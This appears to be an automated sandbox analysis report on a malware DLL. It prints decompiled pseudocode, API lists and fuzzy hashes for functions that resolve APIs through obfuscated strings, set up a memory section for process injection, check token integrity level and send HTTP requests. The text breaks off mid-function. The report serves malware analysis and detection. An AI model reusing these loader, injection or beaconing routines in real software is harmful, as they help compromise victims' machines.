                                      • String ID: FNwPq
                                      • API String ID: 4246211962-3591455833
                                      • Opcode ID: ed0270edecb198ae58036c3122546cdd814232529d38f0516eb789f7eb09cf06
                                      • Instruction ID: 6e7162a5644e6f948f93848a5bf47acce7b6d2e29dd71f0c818e7ddec8893703
                                      • Opcode Fuzzy Hash: ed0270edecb198ae58036c3122546cdd814232529d38f0516eb789f7eb09cf06
                                      • Instruction Fuzzy Hash: D451C671B01225ABEB21BBA7DC55B7E37ACFB04B14F0448A5E501EB341E7B4F9408BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE2384 Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      C-Code - Quality: 73%
                                      			E04DE2384(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E04DE74E0(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E04DE799E( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x4dea300 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x4dea348; // 0x6bd5a8
					_t18 = _t47 + 0x4deb3e6; // 0x73797325
					_t68 = E04DE50E8(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x4dea348; // 0x6bd5a8
						_t19 = _t50 + 0x4deb747; // 0x54a8cef
						_t20 = _t50 + 0x4deb0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E04DE37E9();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
							_push(1);
							E04DE37E9();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								FindCloseChangeNotification(_v28); // executed
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x4dea2d8, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E04DE4C73(_t70);
				goto L12;
			}


















                                      0x04de238c
                                      0x04de238c
                                      0x04de239b
                                      0x04de23a2
                                      0x04de23a7
                                      0x04de24b4
                                      0x04de24bb
                                      0x04de24bb
                                      0x04de23b6
                                      0x04de23be
                                      0x04de23c1
                                      0x04de23c6
                                      0x04de23db
                                      0x04de23e1
                                      0x04de23e2
                                      0x04de23e5
                                      0x04de23eb
                                      0x04de23ee
                                      0x04de23f3
                                      0x04de23fb
                                      0x04de2407
                                      0x04de240b
                                      0x04de249b
                                      0x04de2411
                                      0x04de2411
                                      0x04de2416
                                      0x04de241d
                                      0x04de2431
                                      0x04de2435
                                      0x04de2484
                                      0x04de2437
                                      0x04de2438
                                      0x04de243f
                                      0x04de2458
                                      0x04de245a
                                      0x04de245e
                                      0x04de2465
                                      0x04de247f
                                      0x04de2467
                                      0x04de2470
                                      0x04de2475
                                      0x04de2475
                                      0x04de2465
                                      0x04de2493
                                      0x04de2493
                                      0x04de240b
                                      0x04de24a2
                                      0x04de24ab
                                      0x04de24af
                                      0x00000000

                                      APIs
                                        • Part of subcall function 04DE74E0: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04DE23A0,?,?,?,?,00000000,00000000), ref: 04DE7505
                                        • Part of subcall function 04DE74E0: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04DE7527
                                        • Part of subcall function 04DE74E0: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04DE753D
                                        • Part of subcall function 04DE74E0: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04DE7553
                                        • Part of subcall function 04DE74E0: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04DE7569
                                        • Part of subcall function 04DE74E0: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04DE757F
                                      • memset.NTDLL ref: 04DE23EE
                                        • Part of subcall function 04DE50E8: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04DE2407,73797325), ref: 04DE50F9
                                        • Part of subcall function 04DE50E8: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04DE5113
                                      • GetModuleHandleA.KERNEL32(4E52454B,054A8CEF,73797325), ref: 04DE2424
                                      • GetProcAddress.KERNEL32(00000000), ref: 04DE242B
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 04DE2493
                                        • Part of subcall function 04DE37E9: GetProcAddress.KERNEL32(36776F57,04DE3ECD), ref: 04DE3804
                                      • FindCloseChangeNotification.KERNEL32(00000000,00000001), ref: 04DE2470
                                      • CloseHandle.KERNEL32(?), ref: 04DE2475
                                      • GetLastError.KERNEL32(00000001), ref: 04DE2479
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ChangeErrorFindFreeHeapLastNotificationmemset
                                      • String ID:
                                      • API String ID: 186216982-0
                                      • Opcode ID: a62a0961dddc34bb577f75dbd2d131bb7258e452ef1006de7ad1913185d5af96
                                      • Instruction ID: 524b0946ec5101644b2f89d6f7aac64af95838b842d34f1efa350850782efbd8
                                      • Opcode Fuzzy Hash: a62a0961dddc34bb577f75dbd2d131bb7258e452ef1006de7ad1913185d5af96
                                      • Instruction Fuzzy Hash: DA312FB2900209AFDB10FFE6DC98DAEBBBCEB04358F1044A5E646A7211D735BD45DB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE7628 Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      C-Code - Quality: 100%
                                      			E04DE7628(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x4dea2fc > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E04DE4DF6(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E04DE4C73(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                      0x04de7635
                                      0x04de763c
                                      0x04de7643
                                      0x04de7657
                                      0x04de7662
                                      0x04de767a
                                      0x04de7687
                                      0x04de768a
                                      0x04de768f
                                      0x04de769a
                                      0x04de769e
                                      0x04de76ad
                                      0x04de76b1
                                      0x04de76cd
                                      0x04de76cd
                                      0x04de76d1
                                      0x04de76d1
                                      0x04de76d6
                                      0x04de76da
                                      0x04de76e0
                                      0x04de76e1
                                      0x04de76e8
                                      0x04de76ee

                                      APIs
                                      • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04DE765A
                                      • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04DE767A
                                      • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04DE768A
                                      • CloseHandle.KERNEL32(00000000), ref: 04DE76DA
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04DE76AD
                                      • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04DE76B5
                                      • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04DE76C5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                      • String ID:
                                      • API String ID: 1295030180-0
                                      • Opcode ID: 0f1751712e17f133da73cde76c7003b56e15582e41dfb6493f655b2aa7642657
                                      • Instruction ID: 568a8f1ac38f724bfe6d6dc9d67b5e221871d58fa6d512b3015c8ad5afab15fd
                                      • Opcode Fuzzy Hash: 0f1751712e17f133da73cde76c7003b56e15582e41dfb6493f655b2aa7642657
                                      • Instruction Fuzzy Hash: 5B212A75A00209FFEB10AF96DD84EFEBB79FB44308F1000A5EA10A6261D7755E54EB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE3739 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      C-Code - Quality: 64%
                                      			E04DE3739(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x4dea348; // 0x6bd5a8
				_t1 = _t9 + 0x4deb62c; // 0x253d7325
				_t36 = 0;
				_t28 = E04DE403D(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t40 = E04DE4DF6(_v8 +  *_t39(_a4) + 1);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E04DE723B(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E04DE4C73(_t40);
						_t42 = E04DE20D2(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E04DE4C73(_t36);
							_t36 = _t42;
						}
						_t43 = E04DE72E7(_t36, _t33);
						if(_t43 != 0) {
							E04DE4C73(_t36);
							_t36 = _t43;
						}
					}
					E04DE4C73(_t28);
				}
				return _t36;
			}
















                                      0x04de3739
                                      0x04de373c
                                      0x04de373d
                                      0x04de3744
                                      0x04de374b
                                      0x04de3752
                                      0x04de3756
                                      0x04de375d
                                      0x04de3764
                                      0x04de3769
                                      0x04de377b
                                      0x04de377f
                                      0x04de3783
                                      0x04de3789
                                      0x04de378e
                                      0x04de3798
                                      0x04de379e
                                      0x04de37a0
                                      0x04de37b7
                                      0x04de37bb
                                      0x04de37be
                                      0x04de37c3
                                      0x04de37c3
                                      0x04de37cc
                                      0x04de37d0
                                      0x04de37d3
                                      0x04de37d8
                                      0x04de37d8
                                      0x04de37d0
                                      0x04de37db
                                      0x04de37e0
                                      0x04de37e6

                                      APIs
                                        • Part of subcall function 04DE403D: lstrlen.KERNEL32(00000000,00000000,00000000,76D8C740,?,?,?,04DE3752,253D7325,00000000,76D8C740,?,?,04DE653D,?,054A95B0), ref: 04DE40A4
                                        • Part of subcall function 04DE403D: sprintf.NTDLL ref: 04DE40C5
                                      • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,76D8C740,?,?,04DE653D,?,054A95B0), ref: 04DE3764
                                      • lstrlen.KERNEL32(?,?,?,04DE653D,?,054A95B0), ref: 04DE376C
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • strcpy.NTDLL ref: 04DE3783
                                      • lstrcat.KERNEL32(00000000,?), ref: 04DE378E
                                        • Part of subcall function 04DE723B: lstrlen.KERNEL32(?,?,?,00000000,?,04DE379D,00000000,?,?,?,04DE653D,?,054A95B0), ref: 04DE724C
                                        • Part of subcall function 04DE4C73: RtlFreeHeap.NTDLL(00000000,00000000,04DE55C4,00000000,?,?,00000000), ref: 04DE4C7F
                                      • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04DE653D,?,054A95B0), ref: 04DE37AB
                                        • Part of subcall function 04DE20D2: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04DE37B7,00000000,?,?,04DE653D,?,054A95B0), ref: 04DE20DC
                                        • Part of subcall function 04DE20D2: _snprintf.NTDLL ref: 04DE213A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                      • String ID: =
                                      • API String ID: 2864389247-1428090586
                                      • Opcode ID: e32ac6b31aaf4c3f59760339103ebd01b8324a01defa79c9a6d63837a64b428e
                                      • Instruction ID: f1e62ccb4653625cc1368292b22d860fcb14f6b4c616487adffb5ef6f1be2673
                                      • Opcode Fuzzy Hash: e32ac6b31aaf4c3f59760339103ebd01b8324a01defa79c9a6d63837a64b428e
                                      • Instruction Fuzzy Hash: 5E11E0B3B01525779712BBBB9C98CBE36ACEE896687054116F9009B200DF79ED0287B0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE3C00 Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 368 4de3c00-4de3c32 call 4de1162 371 4de3d1a-4de3d20 368->371 372 4de3c38-4de3c3f call 4de6615 368->372 374 4de3c44-4de3c48 372->374 375 4de3c4e-4de3c60 SysAllocString 374->375 376 4de3d11-4de3d16 374->376 377 4de3cdf-4de3ce3 375->377 378 4de3c62-4de3c75 SysAllocString 375->378 376->371 379 4de3cee-4de3cf2 377->379 380 4de3ce5-4de3ce8 SysFreeString 377->380 378->377 381 4de3c77-4de3c7b 378->381 382 4de3cfd-4de3cff 379->382 383 4de3cf4-4de3cf7 SysFreeString 379->383 380->379 384 4de3c8f-4de3cdd 381->384 385 4de3c7d-4de3c87 SysAllocString 381->385 386 4de3d08-4de3d0d 382->386 387 4de3d01-4de3d02 SysFreeString 382->387 383->382 384->377 385->379 388 4de3c89-4de3c8b 385->388 386->376 387->386 388->384
                                      APIs
                                        • Part of subcall function 04DE1162: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,054A89D8,04DE3C2E,?,?,?,?,?,?,?,?,?,?,?,04DE3C2E), ref: 04DE122F
                                        • Part of subcall function 04DE6615: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 04DE6652
                                        • Part of subcall function 04DE6615: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 04DE6683
                                      • SysAllocString.OLEAUT32(00000000), ref: 04DE3C5A
                                      • SysAllocString.OLEAUT32(0070006F), ref: 04DE3C6E
                                      • SysAllocString.OLEAUT32(00000000), ref: 04DE3C80
                                      • SysFreeString.OLEAUT32(00000000), ref: 04DE3CE8
                                      • SysFreeString.OLEAUT32(00000000), ref: 04DE3CF7
                                      • SysFreeString.OLEAUT32(00000000), ref: 04DE3D02
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                                      • String ID:
                                      • API String ID: 2831207796-0
                                      • Opcode ID: 8a30c4b932add5f384abaab98ff94d7c68e52d5aac51376065be0fb92564c1e1
                                      • Instruction ID: c56fdc778d2a385c557c67e212a5e7b7e511c273e71a35783a825a55f72c2dc5
                                      • Opcode Fuzzy Hash: 8a30c4b932add5f384abaab98ff94d7c68e52d5aac51376065be0fb92564c1e1
                                      • Instruction Fuzzy Hash: 49414136A00609AFDB01EFBAD844ABEB7BAFF49304F144465ED14EB210DA71ED05CB51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE74E0 Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E04DE74E0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E04DE4DF6(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x4dea348; // 0x6bd5a8
					_t1 = _t23 + 0x4deb11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x4dea348; // 0x6bd5a8
					_t2 = _t26 + 0x4deb769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E04DE4C73(_t54);
					} else {
						_t30 =  *0x4dea348; // 0x6bd5a8
						_t5 = _t30 + 0x4deb756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x4dea348; // 0x6bd5a8
							_t7 = _t33 + 0x4deb40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x4dea348; // 0x6bd5a8
								_t9 = _t36 + 0x4deb4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x4dea348; // 0x6bd5a8
									_t11 = _t39 + 0x4deb779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04DE25D7(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                      0x04de74ef
                                      0x04de74f3
                                      0x04de75b5
                                      0x04de74f9
                                      0x04de74f9
                                      0x04de74fe
                                      0x04de7511
                                      0x04de7513
                                      0x04de7518
                                      0x04de7520
                                      0x04de7527
                                      0x04de7529
                                      0x04de752e
                                      0x04de75ad
                                      0x04de75ae
                                      0x04de7530
                                      0x04de7530
                                      0x04de7535
                                      0x04de753d
                                      0x04de753f
                                      0x04de7544
                                      0x00000000
                                      0x04de7546
                                      0x04de7546
                                      0x04de754b
                                      0x04de7553
                                      0x04de7555
                                      0x04de755a
                                      0x00000000
                                      0x04de755c
                                      0x04de755c
                                      0x04de7561
                                      0x04de7569
                                      0x04de756b
                                      0x04de7570
                                      0x00000000
                                      0x04de7572
                                      0x04de7572
                                      0x04de7577
                                      0x04de757f
                                      0x04de7581
                                      0x04de7586
                                      0x00000000
                                      0x04de7588
                                      0x04de758e
                                      0x04de7593
                                      0x04de759a
                                      0x04de759f
                                      0x04de75a4
                                      0x00000000
                                      0x04de75a6
                                      0x04de75a9
                                      0x04de75a9
                                      0x04de75a4
                                      0x04de7586
                                      0x04de7570
                                      0x04de755a
                                      0x04de7544
                                      0x04de752e
                                      0x04de75c3

                                      APIs
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04DE23A0,?,?,?,?,00000000,00000000), ref: 04DE7505
                                      • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04DE7527
                                      • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04DE753D
                                      • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04DE7553
                                      • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04DE7569
                                      • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04DE757F
                                        • Part of subcall function 04DE25D7: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,77004EE0,00000000,00000000,04DE759F), ref: 04DE2634
                                        • Part of subcall function 04DE25D7: memset.NTDLL ref: 04DE2656
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                      • String ID:
                                      • API String ID: 3012371009-0
                                      • Opcode ID: 2dac6d9c0b5347c7c55fcfa499297bdbe9e1345f7ddf37d3deeb9e3278cb1340
                                      • Instruction ID: 48748ab5fd575a150d637a45b9118221b153a51e23f465ba04005959366a10ce
                                      • Opcode Fuzzy Hash: 2dac6d9c0b5347c7c55fcfa499297bdbe9e1345f7ddf37d3deeb9e3278cb1340
                                      • Instruction Fuzzy Hash: 132117B160070BAFDB50FFABC898E6AB7ECEB442047018026E505CB751E774F9048B60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE4BD6 Relevance: 9.0, APIs: 6, Instructions: 45networkCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E04DE4BD6(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0) {
					_t9 = E04DE5296(__eax + 4, _t18, _a4, __eax, __eax + 4); // executed
					if(_t9 == 0) {
						L9:
						return GetLastError();
					}
				}
				_t10 = E04DE7A71(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                      0x04de4bd6
                                      0x04de4be3
                                      0x04de4be5
                                      0x04de4bf0
                                      0x04de4bf7
                                      0x04de4c48
                                      0x00000000
                                      0x04de4c48
                                      0x04de4bf7
                                      0x04de4bfd
                                      0x04de4c04
                                      0x04de4c10
                                      0x04de4c15
                                      0x04de4c2b
                                      0x04de4c3b
                                      0x00000000
                                      0x04de4c2d
                                      0x04de4c2d
                                      0x04de4c34
                                      0x04de4c41
                                      0x04de4c41
                                      0x04de4c41
                                      0x04de4c34
                                      0x04de4c2b
                                      0x04de4c46
                                      0x00000000
                                      0x00000000
                                      0x04de4c4c

                                      APIs
                                      • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04DE5388,?,?,00000000,00000000), ref: 04DE4C10
                                      • ResetEvent.KERNEL32(?), ref: 04DE4C15
                                      • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 04DE4C22
                                      • GetLastError.KERNEL32 ref: 04DE4C2D
                                      • GetLastError.KERNEL32(?,?,00000102,04DE5388,?,?,00000000,00000000), ref: 04DE4C48
                                        • Part of subcall function 04DE5296: lstrlen.KERNEL32(00000000,00000008,?,77004D40,?,?,04DE4BF5,?,?,?,?,00000102,04DE5388,?,?,00000000), ref: 04DE52A2
                                        • Part of subcall function 04DE5296: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04DE4BF5,?,?,?,?,00000102,04DE5388,?), ref: 04DE5300
                                        • Part of subcall function 04DE5296: lstrcpy.KERNEL32(00000000,00000000), ref: 04DE5310
                                      • SetEvent.KERNEL32(?), ref: 04DE4C3B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                                      • String ID:
                                      • API String ID: 3739416942-0
                                      • Opcode ID: 9f8c4146aa61b2201dacd0ed70a4d10e6b89772b5e46026ac4fd7de3851998fb
                                      • Instruction ID: 8bdf41501ec21b7c3aa72c03aa7b81ac65665f61ffd28ed5244bb86757b78075
                                      • Opcode Fuzzy Hash: 9f8c4146aa61b2201dacd0ed70a4d10e6b89772b5e46026ac4fd7de3851998fb
                                      • Instruction Fuzzy Hash: 6001AD71200200AADB307F63EE54F6B77E9FF84325F110724F456922E0D621F804EA20
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE6E20 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 88%
                                      			E04DE6E20(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				char _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
